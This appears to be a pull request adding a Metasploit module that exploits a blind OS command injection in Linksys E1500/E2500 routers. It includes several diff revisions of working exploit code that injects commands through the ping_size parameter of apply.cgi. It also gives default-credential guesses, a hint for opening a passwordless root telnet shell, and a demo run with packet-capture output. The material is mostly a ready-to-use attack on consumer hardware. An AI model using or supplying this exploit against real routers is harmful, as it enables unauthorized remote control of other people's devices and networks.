### PR TITLE
initial commit

### DIFF
--- a/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb
+++ b/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb
@@ -23,7 +23,8 @@ class Metasploit3 < Msf::Auxiliary
 				not see any output of your command. Try a ping command to your local system for a
 				first test.
 
-				Hint: To get a remote shell you could upload a cross-compiled netcat binary and exec it.
+				Hint: To get a remote shell you could start telnetd and touch /etc/group. Use the 
+				user root without a password for accessing the device.
 			},
 			'Author'          => [ 'm-1-k-3' ],
 			'License'         => MSF_LICENSE,
@@ -35,14 +36,13 @@ class Metasploit3 < Msf::Auxiliary
 					[ 'OSVDB', '89912' ],
 					[ 'BID', '57760' ]
 				],
-			'DefaultTarget'  => 0,
 			'DisclosureDate' => 'Feb 05 2013'))
 
 		register_options(
 			[
 				OptString.new('USERNAME',[ true, 'User to login with', 'admin']),
 				OptString.new('PASSWORD',[ true, 'Password to login with', 'password']),
-				OptString.new('CMD', [ true, 'The command to execute', 'ping 127.0.0.1'])
+				OptString.new('CMD', [ true, 'The command to execute', 'telnetd -p 1337'])
 			], self.class)
 	end
 
@@ -90,7 +90,6 @@ class Metasploit3 < Msf::Auxiliary
 					'uri'    => uri,
 					'method' => 'POST',
 					'authorization' => basic_auth(user,pass),
-					'encode_params' => false,
 					'vars_post' => {
 						"submit_button" => "Diagnostics",
 						"change_action" => "gozila_cgi",
@@ -98,7 +97,7 @@ class Metasploit3 < Msf::Auxiliary
 						"action" => "",
 						"commit" => "0",
 						"ping_ip" => "1.1.1.1",
-						"ping_size" => "%26#{cmd}%26",
+						"ping_size" => "&#{cmd}&",
 						"ping_times" => "5",
 						"traceroute_ip" => ""
 						}

--- a/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb
+++ b/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb
@@ -1,0 +1,113 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'            => 'Linksys E1500/E2500 Remote OS Command Execution',
+			'Description'     => %q{
+					Some Linksys Routers are vulnerable to OS Command injection.
+				You will need credentials to the webinterface to access the vulnerable part
+				of the application. Default credentials are always a good starting point.
+				admin/admin or admin/password could be a first try.
+				Note: This is a blind os command injection vulnerability. This means that you will
+				not see any output of your command. Try a ping command to your local system for a
+				first test.
+
+				Hint: To get a remote shell you could upload a cross-compiled netcat binary and exec it.
+			},
+			'Author'          => [ 'm-1-k-3' ],
+			'License'         => MSF_LICENSE,
+			'References'      =>
+				[
+					[ 'URL', 'http://homesupport.cisco.com/de-eu/support/routers/E1500' ],
+					[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-004' ],
+					[ 'EDB', '24475' ],
+					[ 'OSVDB', '89912' ],
+					[ 'BID', '57760' ]
+				],
+			'DefaultTarget'  => 0,
+			'DisclosureDate' => 'Feb 05 2013'))
+
+		register_options(
+			[
+				Opt::RPORT(80),
+				OptString.new('USERNAME',[ true, 'User to login with', 'admin']),
+				OptString.new('PASSWORD',[ true, 'Password to login with', 'password']),
+				OptString.new('CMD', [ true, 'The command to execute', 'ping 127.0.0.1'])
+			], self.class)
+	end
+
+	def run
+		uri = '/apply.cgi'
+		user = datastore['USERNAME']
+		pass = datastore['PASSWORD']
+
+		print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
+
+		begin
+				res = send_request_cgi({
+						'uri'     => uri,
+						'method'  => 'GET',
+						'authorization' => basic_auth(user,pass)
+						})
+
+				return :abort if res.nil?
+				return :abort if (res.code == 404)
+
+			if [200, 301, 302].include?(res.code)
+				print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
+			else
+				vprint_error("#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
+				return
+			end
+
+		rescue ::Rex::ConnectionError
+				vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
+				return
+		end
+
+
+		print_status("#{rhost}:#{rport} - Sending remote command: " + datastore['CMD'])
+
+		cmd = datastore['CMD']
+		#original post request:
+		data_cmd = "submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=%26#{cmd}%26&ping_times=5&traceroute_ip="
+
+		vprint_status("#{rhost}:#{rport} - using the following target URL: \n#{uri}")
+		begin
+			res = send_request_cgi(
+				{
+					'uri'    => uri,
+					'method' => 'POST',
+					'authorization' => basic_auth(user,pass),
+					'data'  => data_cmd
+					#vars_post not working?
+					#'vars_post' => {
+					#	"submit_button" => "Diagnostics",
+					#	"change_action" => "gozila_cgi",
+					#	"submit_type" => "start_ping",
+					#	"action" => "",
+					#	"commit" => "0",
+					#	"ping_ip" => "1.1.1.1",
+					#	"ping_size" => "%26#{cmd}%26",
+					#	"ping_times" => "5",
+					#	"traceroute_ip" => ""
+					#	}
+				})
+		rescue ::Rex::ConnectionError
+			vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
+			return :abort
+		end
+		print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
+	end
+end

--- a/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb
+++ b/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb
@@ -66,7 +66,7 @@ class Metasploit3 < Msf::Auxiliary
 			if [200, 301, 302].include?(res.code)
 				print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
 			else
-				vprint_error("#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
+				print_error("#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
 				return
 			end
 
@@ -90,7 +90,6 @@ class Metasploit3 < Msf::Auxiliary
 					'uri'    => uri,
 					'method' => 'POST',
 					'authorization' => basic_auth(user,pass),
-					#'data'  => data_cmd
 					'encode_params' => false,
 					'vars_post' => {
 						"submit_button" => "Diagnostics",
@@ -109,5 +108,6 @@ class Metasploit3 < Msf::Auxiliary
 			return
 		end
 		print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
+		print_status("#{rhost}:#{rport} - Blind Exploitation - wait around 10 seconds till the command gets executed")
 	end
 end

--- a/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb
+++ b/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb
@@ -40,7 +40,6 @@ class Metasploit3 < Msf::Auxiliary
 
 		register_options(
 			[
-				Opt::RPORT(80),
 				OptString.new('USERNAME',[ true, 'User to login with', 'admin']),
 				OptString.new('PASSWORD',[ true, 'Password to login with', 'password']),
 				OptString.new('CMD', [ true, 'The command to execute', 'ping 127.0.0.1'])
@@ -61,8 +60,8 @@ class Metasploit3 < Msf::Auxiliary
 						'authorization' => basic_auth(user,pass)
 						})
 
-				return :abort if res.nil?
-				return :abort if (res.code == 404)
+				return if res.nil?
+				return if (res.code == 404)
 
 			if [200, 301, 302].include?(res.code)
 				print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
@@ -81,32 +80,33 @@ class Metasploit3 < Msf::Auxiliary
 
 		cmd = datastore['CMD']
 		#original post request:
-		data_cmd = "submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=%26#{cmd}%26&ping_times=5&traceroute_ip="
+		#data_cmd = "submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&
+		#action=&commit=0&ping_ip=1.1.1.1&ping_size=%26#{cmd}%26&ping_times=5&traceroute_ip="
 
-		vprint_status("#{rhost}:#{rport} - using the following target URL: \n#{uri}")
+		vprint_status("#{rhost}:#{rport} - using the following target URL: #{uri}")
 		begin
 			res = send_request_cgi(
 				{
 					'uri'    => uri,
 					'method' => 'POST',
 					'authorization' => basic_auth(user,pass),
-					'data'  => data_cmd
-					#vars_post not working?
-					#'vars_post' => {
-					#	"submit_button" => "Diagnostics",
-					#	"change_action" => "gozila_cgi",
-					#	"submit_type" => "start_ping",
-					#	"action" => "",
-					#	"commit" => "0",
-					#	"ping_ip" => "1.1.1.1",
-					#	"ping_size" => "%26#{cmd}%26",
-					#	"ping_times" => "5",
-					#	"traceroute_ip" => ""
-					#	}
+					#'data'  => data_cmd
+					'encode_params' => false,
+					'vars_post' => {
+						"submit_button" => "Diagnostics",
+						"change_action" => "gozila_cgi",
+						"submit_type" => "start_ping",
+						"action" => "",
+						"commit" => "0",
+						"ping_ip" => "1.1.1.1",
+						"ping_size" => "%26#{cmd}%26",
+						"ping_times" => "5",
+						"traceroute_ip" => ""
+						}
 				})
 		rescue ::Rex::ConnectionError
 			vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
-			return :abort
+			return
 		end
 		print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
 	end


### PR DESCRIPTION
One more module for the Linksys e1500 and e2500 device

Exploiting Demo - 192.168.178.105 / 0 auxiliary(linksys_e1500_e2500_exec) > set CMD ping -c 1 192.168.178.105
CMD => ping -c 1 192.168.178.105
Exploiting Demo - 192.168.178.105 / 0 auxiliary(linksys_e1500_e2500_exec) > run

[_] 192.168.178.199:80 - Trying to login with admin / admin
[+] 192.168.178.199:80 - Successful login admin/admin
[_] 192.168.178.199:80 - Sending remote command: ping -c 1 192.168.178.105
[_] 192.168.178.199:80 - Blind Exploitation - unknown Exploitation state
[_] Auxiliary module execution completed

root@bt:~# tcpdump -i eth2 'icmp'
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth2, link-type EN10MB (Ethernet), capture size 65535 bytes
17:19:45.759253 IP 192.168.178.199 > 192.168.178.105: ICMP echo request, id 8706, seq 0, length 64
17:19:45.759283 IP 192.168.178.105 > 192.168.178.199: ICMP echo reply, id 8706, seq 0, length 64
17:26:56.957656 IP 192.168.178.199 > 192.168.178.105: ICMP echo request, id 24066, seq 0, length 64
17:26:56.957681 IP 192.168.178.105 > 192.168.178.199: ICMP echo reply, id 24066, seq 0, length 64
